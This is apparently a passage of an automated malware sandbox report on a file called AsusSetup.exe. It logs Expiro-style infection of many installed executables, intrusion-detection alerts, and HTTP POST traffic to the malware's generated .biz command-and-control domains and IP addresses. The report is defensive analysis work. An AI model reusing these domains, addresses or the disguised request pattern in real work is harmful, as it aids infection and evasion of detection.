Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Users\user\Desktop\AsusSetup.exe, System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\Desktop\AsusSetup.exe, System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

Networking

Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:58296 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49733 -> 18.141.10.107:80
Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:53248 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49824 -> 34.211.97.45:80
Source: Network traffic | Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:60487 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.4:50839 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.4:53838 -> 1.1.1.1:53
Source: unknown | DNS traffic detected: English language letter frequency does not match the domain names
Source: unknown | Network traffic detected: DNS query count 88
Source: Joe Sandbox View | IP Address: 165.160.15.20
Source: Joe Sandbox View | IP Address: 3.254.94.185
Source: global trafficHTTP traffic detected: POST /tqhhuuvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 798
Source: global trafficHTTP traffic detected: POST /spoyvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 798
Source: global trafficHTTP traffic detected: POST /fnkotvtiwfwjvbky HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /aay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 798
Source: global trafficHTTP traffic detected: POST /ywrwbyxrs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 798
Source: global trafficHTTP traffic detected: POST /ils HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /beqepswmsyxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /rdbyhsstwxr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dbhv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /uyurjsjwfnxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qmxhsynps HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /saedqhwkiyelcofi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /wxhqgp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /lxjfxiwwkxywcqoq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /uswmbyvknw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /shm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /nxomllvrieoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ywkdmkysrijolmoj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ws HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yhrktnvbm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mjmfrcmno HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cxtfkubsyhri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tocvykftorkpni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mmdfp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yhdmpa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tjrtnokwwlpftv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknown
UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic
DNS traffic detected: DNS query: pywolwnvd.biz
